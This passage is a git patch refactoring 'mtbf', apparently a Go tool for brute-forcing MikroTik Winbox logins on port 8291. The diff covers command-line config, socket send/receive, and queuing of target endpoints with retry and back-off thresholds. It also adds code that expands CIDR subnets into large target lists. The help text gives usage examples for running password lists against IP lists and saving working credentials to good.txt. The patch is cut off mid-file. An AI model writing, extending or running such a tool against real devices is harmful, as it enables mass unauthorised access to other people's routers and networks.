From ac9935a4e0cef8a3a5138d78414e3aeef7878a50 Mon Sep 17 00:00:00 2001 From: dave Date: Sat, 10 Dec 2022 23:09:30 +0300 Subject: [PATCH] feat: refactor --- bigint.go | 2 + config.go | 383 +++++++++++++------------- conn.go | 60 ++++- crypt.go | 12 +- endpoint.go | 350 ++++++------------------ eparse.go | 154 +++++++++++ go.mod | 2 +- legacy-winbox.go | 679 +++++++++++++++++++++++------------------------ log.go | 28 +- math.go | 3 +- mtbf.go | 8 +- results.go | 57 ++-- service.go | 3 +- source.go | 334 ++++++++++++----------- task.go | 136 ++++------ thread.go | 130 ++++----- winbox.go | 21 +- 17 files changed, 1145 insertions(+), 1217 deletions(-) create mode 100644 eparse.go diff --git a/bigint.go b/bigint.go index 34bf2b8..9adabf3 100644 --- a/bigint.go +++ b/bigint.go @@ -1,5 +1,7 @@ package main +// bigint.go: methods for bigint operation chaining + import ( "math/big" ) diff --git a/config.go b/config.go index b2e7bd6..c15f5f6 100644 --- a/config.go +++ b/config.go @@ -8,6 +8,74 @@ import ( "time" ) +var configMap = map[string]configParameter{} +var configAliasMap = map[string]string{} + +func init() { + registerCommand("help", "show program usage", func() { + log("", 0, "options:") + + parms := make([]string, 0, len(configMap)) + for key := range configMap { + parms = append(parms, key) + } + sort.Strings(parms) + + for _, parmName := range parms { + parm := configMap[parmName] + + if parm.hidden { + continue + } + + header := "-" + parm.name + if len(parm.name) > 1 { + header = "-" + header + } + + aliases := []string{} + for alias, target := range configAliasMap { + if target == parm.name { + if len(alias) == 1 { + aliases = append(aliases, "-"+alias) + } else { + aliases = append(aliases, "--"+alias) + } + } + } + + if len(aliases) > 0 { + sort.Strings(aliases) + header = header + " (aliases: " + strings.Join(aliases, ", ") + ")" + } + + header = header + ":" + description := " (description missing)" + if parm.description != "" { + description = " " + parm.description + } + + if parm.command || parm.sw { + log("", 0, "%s\n%s", header, description) + } else { + log("", 0, "%s\n%s\n default: %v", header, description, parm.value) + } + } + + log("", 0, "") + log("", 0, "examples:") + log("", 0, " single target:") + log("", 0, " ./mtbf --ip 127.0.0.1 --port 8291 --login admin --password 12345678 --out-file good.txt") + log("", 0, " multiple targets with multiple passwords:") + log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt") + + os.Exit(0) + }) + + registerAlias("?", "help") + registerAlias("h", "help") +} + // configParameterOptions represents additional options for a configParameter. type configParameterOptions struct { sw, hidden, command bool @@ -24,16 +92,128 @@ type configParameter struct { } type configParameterTypeUnion = interface { - bool | int | uint | float64 | string | []int | []uint | []float64 | []string | []bool + bool | int | uint | float64 | string | []int | []uint | []float64 | []string | []bool | map[string]bool } -var configMap = map[string]configParameter{} -var configAliasMap = map[string]string{} +// -------------- +// parsing +// -------------- + +func parseAppConfig() { + log("cfg", 1, "parsing config") + + totalFinalized := 0 + + for i := 1; i < len(os.Args); i++ { + arg := getCmdlineParm(i) + if len(arg) == 0 { + continue + } + + failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg) + arg = strings.TrimPrefix(arg, "-") + arg = strings.TrimPrefix(arg, "-") + + failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) + + parm, ok := configMap[strings.ToLower(arg)] + if !ok { + alias, ok := configAliasMap[strings.ToLower(arg)] + failIf(!ok, "unknown commandline parameter: \"%v\"", arg) + + parm, ok = configMap[alias] + failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg) + + log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias, parm.name) + } + + failIf(parm.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) + failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed", parm.name) + + if !parm.command { + if parm.sw { + parm.writeParmValue("true") + } else { + i++ + parm.writeParmValue(getCmdlineParm(i)) + } + } -var configParsingFinished = false + parm.finalize() + totalFinalized++ + } + + log("cfg", 1, "parsed %v commandline parameters", totalFinalized) +} + +// getCmdlineParm retrieves a commandline parameter with index i. +func getCmdlineParm(i int) string { + return strings.TrimSpace(os.Args[i]) +} + +// isSlice checks if a configParameter value is a slice. +func (parm *configParameter) isSlice() bool { + switch parm.value.(type) { + case []int, []uint, []string: + return true + default: + return false + } +} + +// writeParmValue saves raw commandline value into a configParameter. +func (parm *configParameter) writeParmValue(value string) { + var err error + + switch parm.value.(type) { + case bool: + parm.value, err = strconv.ParseBool(value) + failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + case int: + v, err := strconv.ParseInt(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.value = int(v) + case uint: + v, err := strconv.ParseUint(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.value = uint(v) + case string: + parm.value = value + case []bool: + b, err := strconv.ParseBool(value) + failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) + parm.value = append(parm.value.([]bool), b) + case []int: + i, err := strconv.ParseInt(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) + parm.value = append(parm.value.([]int), int(i)) + case []uint: + u, err := strconv.ParseUint(value, 10, 0) + failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) + parm.value = append(parm.value.([]uint), uint(u)) + case []string: + parm.value = append(parm.value.([]string), value) + default: + fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value) + } +} + +// finalize marks a configParameter as parsed, adds it to a global config map +// and calls its callback, if one is present. +func (parm *configParameter) finalize() { + parm.parsed = true + configMap[parm.name] = *parm + + if parm.callback != nil { + parm.callback() + } -// --- + log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value, parm.name, parm.def, parm.value) +} + +// -------------- // registration +// -------------- func registerConfigParameter[T configParameterTypeUnion](name string, def T, description string, opts configParameterOptions) { name = strings.ToLower(name) @@ -54,10 +234,6 @@ func registerParam[T configParameterTypeUnion](name string, def T, description s registerConfigParameter(name, def, description, configParameterOptions{}) } -func registerParamEx[T configParameterTypeUnion](name string, def T, description string, options configParameterOptions) { - registerConfigParameter(name, def, description, options) -} - func registerParamHidden[T configParameterTypeUnion](name string, def T) { registerConfigParameter(name, def, "", configParameterOptions{hidden: true}) } @@ -89,8 +265,9 @@ func registerAlias(alias, target string) { configAliasMap[alias] = target } -// --- +// -------------- // acquisition +// -------------- func getParamGeneric(name string) any { name = strings.ToLower(name) @@ -150,8 +327,9 @@ func getParamDurationMS(name string) time.Duration { return time.Duration(tm) * time.Millisecond } -// --- +// -------------- // setting +// -------------- func setParam(name string, value any) { name = strings.ToLower(name) @@ -169,186 +347,3 @@ func setParam(name string, value any) { configMap[name] = parm } - -// --- -// parsing - -// getCmdlineParm retrieves a commandline parameter with index i. -func getCmdlineParm(i int) string { - return strings.TrimSpace(os.Args[i]) -} - -// isSlice checks if a configParameter value is a slice. -func (parm *configParameter) isSlice() bool { - switch parm.value.(type) { - case []int, []uint, []string: - return true - default: - return false - } -} - -// writeParmValue saves raw commandline value into a configParameter. -func (parm *configParameter) writeParmValue(value string) { - var err error - - switch parm.value.(type) { - case bool: - parm.value, err = strconv.ParseBool(value) - failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) - case int: - v, err := strconv.ParseInt(value, 10, 0) - failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) - parm.value = int(v) - case uint: - v, err := strconv.ParseUint(value, 10, 0) - failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) - parm.value = uint(v) - case string: - parm.value = value - case []bool: - b, err := strconv.ParseBool(value) - failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name) - parm.value = append(parm.value.([]bool), b) - case []int: - i, err := strconv.ParseInt(value, 10, 0) - failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name) - parm.value = append(parm.value.([]int), int(i)) - case []uint: - u, err := strconv.ParseUint(value, 10, 0) - failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name) - parm.value = append(parm.value.([]uint), uint(u)) - case []string: - parm.value = append(parm.value.([]string), value) - default: - fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value) - } -} - -// finalize marks a configParameter as parsed, adds it to a global config map -// and calls its callback, if one is present. -func (parm *configParameter) finalize() { - parm.parsed = true - configMap[parm.name] = *parm - - if parm.callback != nil { - parm.callback() - } - - log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value, parm.name, parm.def, parm.value) -} - -func parseAppConfig() { - log("cfg", 1, "parsing config") - - totalFinalized := 0 - - for i := 1; i < len(os.Args); i++ { - arg := getCmdlineParm(i) - if len(arg) == 0 { - continue - } - - failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg) - arg = strings.TrimPrefix(arg, "-") - arg = strings.TrimPrefix(arg, "-") - - failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) - - parm, ok := configMap[strings.ToLower(arg)] - if !ok { - alias, ok := configAliasMap[strings.ToLower(arg)] - failIf(!ok, "unknown commandline parameter: \"%v\"", arg) - - parm, ok = configMap[alias] - failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg) - - log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias, parm.name) - } - - failIf(parm.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i)) - failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed", parm.name) - - if !parm.command { - if parm.sw { - parm.writeParmValue("true") - } else { - i++ - parm.writeParmValue(getCmdlineParm(i)) - } - } - - parm.finalize() - totalFinalized++ - } - - log("cfg", 1, "parsed %v commandline parameters", totalFinalized) - configParsingFinished = true -} - -func showHelp() { - log("", 0, "options:") - - parms := make([]string, 0, len(configMap)) - for key := range configMap { - parms = append(parms, key) - } - sort.Strings(parms) - - for _, parmName := range parms { - parm := configMap[parmName] - - if parm.hidden { - continue - } - - header := "-" + parm.name - if len(parm.name) > 1 { - header = "-" + header - } - - aliases := []string{} - for alias, target := range configAliasMap { - if target == parm.name { - if len(alias) == 1 { - aliases = append(aliases, "-"+alias) - } else { - aliases = append(aliases, "--"+alias) - } - break - } - } - - if len(aliases) > 0 { - sort.Strings(aliases) - header = header + " (aliases: " + strings.Join(aliases, ", ") + ")" - } - - header = header + ":" - description := " (description missing)" - if parm.description != "" { - description = " " + parm.description - } - - if parm.command || parm.sw { - log("", 0, "%s\n%s", header, description) - } else { - log("", 0, "%s\n%s\n default: %v", header, description, parm.value) - } - } - - log("", 0, "") - log("", 0, "examples:") - log("", 0, " single target:") - log("", 0, " ./mtbf --ip 127.0.0.1 --port 8291 --login admin --password 12345678 --out-file good.txt") - log("", 0, " multiple targets with multiple passwords:") - log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt") - - os.Exit(0) -} - -func init() { - registerCommand("help", "show program usage", showHelp) - registerAlias("?", "help") - registerAlias("h", "help") -} diff --git a/conn.go b/conn.go index e3ea937..4f24284 100644 --- a/conn.go +++ b/conn.go @@ -10,17 +10,37 @@ type Connection struct { dialer net.Dialer socket net.Conn connectTimeout time.Duration - readTimeout time.Duration + sendTimeout time.Duration + recvTimeout time.Duration protocol string } -// NewConnection creates a Connection object. -func NewConnection() *Connection { +func init() { + registerParam("connect-timeout-ms", 3000, "") + registerParam("send-timeout-ms", 2000, "") + registerParam("recv-timeout-ms", 1000, "") +} + +// NewConnection creates a Connection object and optionally connects to an Endpoint. +func NewConnection(endpoint *Endpoint) (*Connection, error) { conn := Connection{} conn.connectTimeout = getParamDurationMS("connect-timeout-ms") - conn.readTimeout = getParamDurationMS("read-timeout-ms") + conn.sendTimeout = getParamDurationMS("send-timeout-ms") + conn.recvTimeout = getParamDurationMS("recv-timeout-ms") conn.protocol = "tcp" - return &conn + + if endpoint != nil { + return &conn, conn.Connect(endpoint) + } else { + return &conn, nil + } +} + +func (conn *Connection) Close() { + if conn.socket != nil { + conn.socket.Close() + conn.socket = nil + } } // Connect initiates a connection to an Endpoint. @@ -31,7 +51,7 @@ func (conn *Connection) Connect(endpoint *Endpoint) (err error) { log("conn", 2, "cannot connect to \"%v\": %v", endpoint, err.Error()) } - return err + return } // SetConnectTimeout sets a custom connect timeout on a Connection. @@ -39,12 +59,28 @@ func (conn *Connection) SetConnectTimeout(timeout time.Duration) { conn.connectTimeout = timeout } -// SetReadTimeout sets a custom read timeout on a Connection. -func (conn *Connection) SetReadTimeout(timeout time.Duration) { - conn.readTimeout = timeout +// Send writes data to a Connection. +func (conn *Connection) Send(data []byte) (err error) { + if len(data) == 0 { + log("conn", 1, "tried to send empty buffer to a socket, ignoring") + return nil + } + + conn.socket.SetWriteDeadline(time.Now().Add(conn.sendTimeout)) + _, err = conn.socket.Write(data) + return } -// Send writes data to a Connection. -func (conn *Connection) Send(data []byte) { - conn.socket.SetReadDeadline(time.Now().Add(conn.readTimeout)) +// Recv receives data from a Connection. +func (conn *Connection) Recv() (data []byte, err error) { + conn.socket.SetReadDeadline(time.Now().Add(conn.recvTimeout)) + + data = make([]byte, 1024) + n, err := conn.socket.Read(data) + if err != nil { + return nil, err + } + + data = data[:n] + return } diff --git a/crypt.go b/crypt.go index a3fe906..c238fe9 100644 --- a/crypt.go +++ b/crypt.go @@ -1,5 +1,7 @@ package main +// crypt.go: various cryptographical operations + import ( "crypto/hmac" cryptoRand "crypto/rand" @@ -9,6 +11,11 @@ import ( "strings" ) +func init() { + registerSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng") + mathRand.Seed(300) +} + func getSHA1Digest(data []byte) []byte { array := sha1.Sum(data) return array[:] @@ -96,8 +103,3 @@ func genRandomBytes(n int) ([]byte, error) { return b, nil } - -func init() { - registerSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng") - mathRand.Seed(300) -} diff --git a/endpoint.go b/endpoint.go index 81f6250..650e00d 100644 --- a/endpoint.go +++ b/endpoint.go @@ -2,14 +2,74 @@ package main import ( "container/list" - "errors" - "net" "strconv" - "strings" "sync" "time" ) +func init() { + endpoints = list.New() + delayedEndpoints = list.New() + + registerParam("port", []int{8291}, "one or more default ports") + registerParam("max-aps", 5, "maximum number of attempts per second for an endpoint") + registerSwitch("no-ipv6", "skip IPv6 entries") + registerSwitch("append-default-ports", "always append default ports even for targets in host:port format") + registerSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets") + + registerSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found") + + registerParam("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value") + registerParam("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection") + registerParam("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections") + registerParam("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections") + + registerParam("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value") + registerParam("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors") + registerParam("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors") + + registerParam("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value") + registerParam("max-read-errors", 20, "always remove endpoint after this many consecutive read errors") + registerParam("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors") + + registerParam("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond") + registerParam("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error") + registerParam("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error") +} + +// FetchEndpoint retrieves an endpoint: first, a delayed list is queried, +// then, if nothing is found, a normal list is searched. +// If all endpoints are delayed, a wait time is returned. +func FetchEndpoint() (e *Endpoint, waitTime time.Duration) { + globalEndpointMutex.Lock() + defer globalEndpointMutex.Unlock() + + log("ep", 4, "fetching an endpoint") + + e, waitTime = GetDelayedEndpoint() + if e != nil { + log("ep", 4, "fetched a delayed endpoint: \"%v\"", e) + return e, 0 + } + + el := endpoints.Front() + if el == nil { + if waitTime == 0 { + log("ep", 1, "out of endpoints") + return nil, 0 + } + + log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime) + return nil, waitTime + } + + endpoints.MoveToBack(el) + e = el.Value.(*Endpoint) + + log("ep", 4, "fetched a normal endpoint: \"%v\"", e) + return e, 0 +} + type Address struct { ip string // TODO: switch to a static 16-byte array port int @@ -28,8 +88,9 @@ const ( type Endpoint struct { addr Address // IP address of an endpoint - loginPos, passwordPos SourcePos // login/password cursors - listElement *list.Element // position in list + loginPos SourcePos + passwordPos SourcePos // login/password cursors + listElement *list.Element // position in list state EndpointState // which state an endpoint is in delayUntil time.Time // when this endpoint can be used again @@ -151,28 +212,10 @@ func (e *Endpoint) Delay(addTime time.Duration) { } } -// MigrateToNormal moves an Endpoint to a normal queue. -// Endpoint mutex is assumed to be taken. -func (e *Endpoint) MigrateToNormal() { - endpointMutex.Lock() - defer endpointMutex.Unlock() - - if e.normalList != nil { - log("ep", 5, "cannot migrate endpoint \"%v\" to normal list: already in the list", e) - } else { - log("ep", 5, "migrating endpoint \"%v\" to normal list", e) - e.normalList = endpoints.PushBack(e) - if e.delayedList != nil { - delayedEndpoints.Remove(e.delayedList) - e.delayedList = nil - } - } -} - // SkipLogin gets the endpoint's current login, // compares it with user-defined login and skips (advances) it if // both logins are equal. -func (e *Endpoint) SkipLogin(login) { +func (e *Endpoint) SkipLogin(login string) { // attempt to fetch next login curLogin, empty := SrcLogin.FetchOne(&e.loginPos, false) if curLogin == login && !empty { // this login has not yet been exhausted? @@ -278,12 +321,12 @@ func (e *Endpoint) Bad() { e.consecutiveProtoErrors = 0 // The endpoint may be in delayed queue, so push it back to the normal queue. - e.MigrateToNormal() + e.SetState(ES_Normal) } // Good is an event handler that gets called when // an authentication attempt to an Endpoint succeeds. -func (e *Endpoint) Good(login) { +func (e *Endpoint) Good(login string) { e.mutex.Lock() defer e.mutex.Unlock() e.consecutiveProtoErrors = 0 @@ -291,7 +334,7 @@ func (e *Endpoint) Good(login) { if !getParamSwitch("keep-endpoint-on-good") { e.Delete() } else { - e.MigrateToNormal() + e.SetState(ES_Normal) e.SkipLogin(login) } } @@ -372,257 +415,24 @@ func (e *Endpoint) Exhausted() { func GetDelayedEndpoint() (e *Endpoint, waitTime time.Duration) { currentTime := time.Now() - if delayedEndpoints.Empty() { + if delayedEndpoints.Len() == 0 { log("ep", 5, "delayed endpoint list is empty") return nil, 0 } - it := delayedEndpoints.IteratorAt(delayedEndpoints.Left()) - for { - k, v := it.Key().(time.Time), it.Value().(*Endpoint) - - if v == nil { - panic("delayed endpoint list contains an empty endpoint") - return nil, 0 - } - - if k.After(currentTime) { - log("ep", 5, "no delayed endpoints can be processed at this time") - return nil, k.Sub(currentTime) - } - - if k.Before(v.delayUntil) { - log("ep", 5, "delayed endpoint was re-delayed: removing lingering definition") - defer delayedEndpoints.Remove(k) - it.Next() - continue - } - - if v.delayUntil.IsZero() { - log("ep", 5, "delayed endpoint is already in normal queue: removing lingering definition") - defer delayedEndpoints.Remove(k) - it.Next() - continue - } - - defer delayedEndpoints.Remove(k) - return v, 0 - } - - log("ep", 5, "delayed endpoint list was holding only lingering definitions and is now empty") - return nil, 0 -} - -// FetchEndpoint retrieves an endpoint: first, a delayed list is queried, -// then, if nothing is found, a normal list is searched, -// and (TODO) if this list is empty or will soon be emptied, -// a new batch of endpoints gets created. -func FetchEndpoint() (e *Endpoint, waitTime time.Duration) { - globalEndpointMutex.Lock() - defer globalEndpointMutex.Unlock() - - log("ep", 4, "fetching an endpoint") - - e, waitTime = GetDelayedEndpoint() - if e != nil { - log("ep", 4, "fetched a delayed endpoint: \"%v\"", e) - return e, 0 - } - - el := endpoints.Front() - if el == nil { - if waitTime == 0 { - log("ep", 1, "out of endpoints") - return nil, 0 - } - - log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime) - return nil, waitTime - } - - endpoints.MoveToBack(el) - e = el.Value.(*Endpoint) + minWaitTime := time.Time{} - log("ep", 4, "fetched an endpoint: \"%v\"", e) - return e, 0 -} - -// --- -// --- -// --- - -// Safety feature, to avoid expanding subnets into a huge amount of IPs. -const maxNetmaskSize = 22 // expands into /10 for IPv4 - -// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints. -func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int { - for _, port := range ports { - ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}} - ep.loginPos.Reset() - ep.passwordPos.Reset() - - ep.listElement = endpoints.PushBack(&ep) - log("ep", 3, "registered endpoint: %v", &ep) - } - - return len(ports) -} - -func incIP(ip net.IP) { - for j := len(ip) - 1; j >= 0; j-- { - ip[j]++ - if ip[j] > 0 { - break + for e := delayedEndpoints.Front(); e != nil; e = e.Next() { + dt := e.Value.(*Endpoint) + if minWaitTime.IsZero() || (dt.delayUntil.Before(minWaitTime) && dt.delayUntil.After(currentTime)) { + minWaitTime = dt.delayUntil } - } -} -// parseCIDR registers multiple endpoints from a CIDR netmask. -func parseCIDR(ip string, ports []int, isIPv6 bool) int { - na, nm, err := net.ParseCIDR(ip) - if err != nil { - log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error()) - return 0 - } - - mask, maskBits := nm.Mask.Size() - if mask < maskBits-maxNetmaskSize { - log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize) - return 0 - } - - curHost := 0 - maxHost := 1<<(maskBits-mask) - 1 - numParsed := 0 - strict := getParamSwitch("strict-subnets") - - log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1) - - for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) { - if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 { - log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String()) - } else { - numParsed += RegisterEndpoint(expIP.String(), ports, isIPv6) + if dt.delayUntil.Before(currentTime) { + delayedEndpoints.Remove(e) + return dt, 0 } - curHost++ } - return numParsed -} - -// parseIPOrCIDR expands plain IP or CIDR to multiple endpoints. -func parseIPOrCIDR(ip string, ports []int, isIPv6 bool) int { - // ip may be a domain name, a CIDR subnet or an IP address - // CIDR subnets must be expanded to plain IPs - - if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet - return parseCIDR(ip, ports, isIPv6) - } else if strings.Count(ip, "/") > 1 { // invalid CIDR notation - log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip) - return 0 - } else { // otherwise, just register - return RegisterEndpoint(ip, ports, isIPv6) - } -} - -// extractIPAndPort extracts all endpoint components. -func extractIPAndPort(str string) (ip string, port int, err error) { - var portString string - ip, portString, err = net.SplitHostPort(str) - if err != nil { - return "", 0, err - } - - port, err = strconv.Atoi(portString) - if err != nil { - return "", 0, err - } - - if port <= 0 || port > 65535 { - return "", 0, errors.New("invalid port: " + strconv.Itoa(port)) - } - - return ip, port, nil -} - -// ParseEndpoints takes a string slice of IPs/CIDR subnets and converts it to a list of endpoints. -func ParseEndpoints(source []string) { - log("ep", 1, "parsing endpoints") - - totalIPv6Skipped := 0 - numParsed := 0 - - for _, str := range source { - if !strings.Contains(str, ":") { - // no ":": this is an ipv4/dn without port, - // parse it with all known ports - - numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), false) - } else { - // either ipv4/dn with port, or ipv6 with/without port - - isIPv6 := strings.Count(str, ":") > 1 - if isIPv6 && getParamSwitch("no-ipv6") { - totalIPv6Skipped++ - continue - } - - if !strings.Contains(str, "]:") && strings.Contains(str, "::") { - // ipv6 without port - numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), true) - continue - } - - ip, port, err := extractIPAndPort(str) - if err != nil { - log("ep", 0, "failed to extract ip/port for \"%v\": %v, ignoring endpoint", str, err.Error()) - continue - } - - ports := []int{port} - // append all default ports - if getParamSwitch("append-default-ports") { - for _, port2 := range getParamIntSlice("port") { - if port != port2 { - ports = append(ports, port2) - } - } - } - - numParsed += parseIPOrCIDR(ip, ports, isIPv6) - } - } - - logIf(totalIPv6Skipped > 0, "ep", 0, "skipped %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped) - log("ep", 1, "finished parsing endpoints: parsed %v out of total %v", numParsed, endpoints.Len()) -} - -func init() { - endpoints = list.New() - delayedEndpoints = list.New() - - registerParam("port", []int{8291}, "one or more default ports") - registerParam("max-aps", 5, "maximum number of attempts per second for an endpoint") - registerSwitch("no-ipv6", "skip IPv6 entries") - registerSwitch("append-default-ports", "always append default ports even for targets in host:port format") - registerSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets") - - registerSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found") - - registerParam("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value") - registerParam("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection") - registerParam("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections") - registerParam("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections") - - registerParam("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value") - registerParam("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors") - registerParam("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors") - - registerParam("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value") - registerParam("max-read-errors", 20, "always remove endpoint after this many consecutive read errors") - registerParam("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors") - - registerParam("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond") - registerParam("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error") - registerParam("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error") + return nil, minWaitTime.Sub(currentTime) } diff --git a/eparse.go b/eparse.go new file mode 100644 index 0000000..876a0ee --- /dev/null +++ b/eparse.go @@ -0,0 +1,154 @@ +package main + +import ( + "errors" + "net" + "strconv" + "strings" +) + +// Safety feature, to avoid expanding subnets into a huge amount of IPs. +const maxNetmaskSize = 22 // expands into /10 for IPv4 + +// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints. +func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int { + for _, port := range ports { + ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}} + ep.loginPos.Reset() + ep.passwordPos.Reset() + + ep.listElement = endpoints.PushBack(&ep) + log("ep", 3, "registered endpoint: %v", &ep) + } + + return len(ports) +} + +func incIP(ip net.IP) { + for j := len(ip) - 1; j >= 0; j-- { + ip[j]++ + if ip[j] > 0 { + break + } + } +} + +// parseCIDR registers multiple endpoints from a CIDR netmask. +func parseCIDR(ip string, ports []int, isIPv6 bool) int { + na, nm, err := net.ParseCIDR(ip) + if err != nil { + log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error()) + return 0 + } + + mask, maskBits := nm.Mask.Size() + if mask < maskBits-maxNetmaskSize { + log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize) + return 0 + } + + curHost := 0 + maxHost := 1<<(maskBits-mask) - 1 + numParsed := 0 + strict := getParamSwitch("strict-subnets") + + log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1) + + for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) { + if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 { + log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String()) + } else { + numParsed += RegisterEndpoint(expIP.String(), ports, isIPv6) + } + curHost++ + } + + return numParsed +} + +// parseIPOrCIDR expands plain IP or CIDR to multiple endpoints. +func parseIPOrCIDR(ip string, ports []int, isIPv6 bool) int { + // ip may be a domain name, a CIDR subnet or an IP address + // CIDR subnets must be expanded to plain IPs + + if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet + return parseCIDR(ip, ports, isIPv6) + } else if strings.Count(ip, "/") > 1 { // invalid CIDR notation + log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip) + return 0 + } else { // otherwise, just register + return RegisterEndpoint(ip, ports, isIPv6) + } +} + +// extractIPAndPort extracts all endpoint components. +func extractIPAndPort(str string) (ip string, port int, err error) { + var portString string + ip, portString, err = net.SplitHostPort(str) + if err != nil { + return "", 0, err + } + + port, err = strconv.Atoi(portString) + if err != nil { + return "", 0, err + } + + if port <= 0 || port > 65535 { + return "", 0, errors.New("invalid port: " + strconv.Itoa(port)) + } + + return ip, port, nil +} + +// ParseEndpoints takes a string slice of IPs/CIDR subnets and converts it to a list of endpoints. +func ParseEndpoints(source []string) { + log("ep", 1, "parsing endpoints") + + totalIPv6Skipped := 0 + numParsed := 0 + + for _, str := range source { + if !strings.Contains(str, ":") { + // no ":": this is an ipv4/dn without port, + // parse it with all known ports + + numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), false) + } else { + // either ipv4/dn with port, or ipv6 with/without port + + isIPv6 := strings.Count(str, ":") > 1 + if isIPv6 && getParamSwitch("no-ipv6") { + totalIPv6Skipped++ + continue + } + + if !strings.Contains(str, "]:") && strings.Contains(str, "::") { + // ipv6 without port + numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), true) + continue + } + + ip, port, err := extractIPAndPort(str) + if err != nil { + log("ep", 0, "failed to extract ip/port for \"%v\": %v, ignoring endpoint", str, err.Error()) + continue + } + + ports := []int{port} + // append all 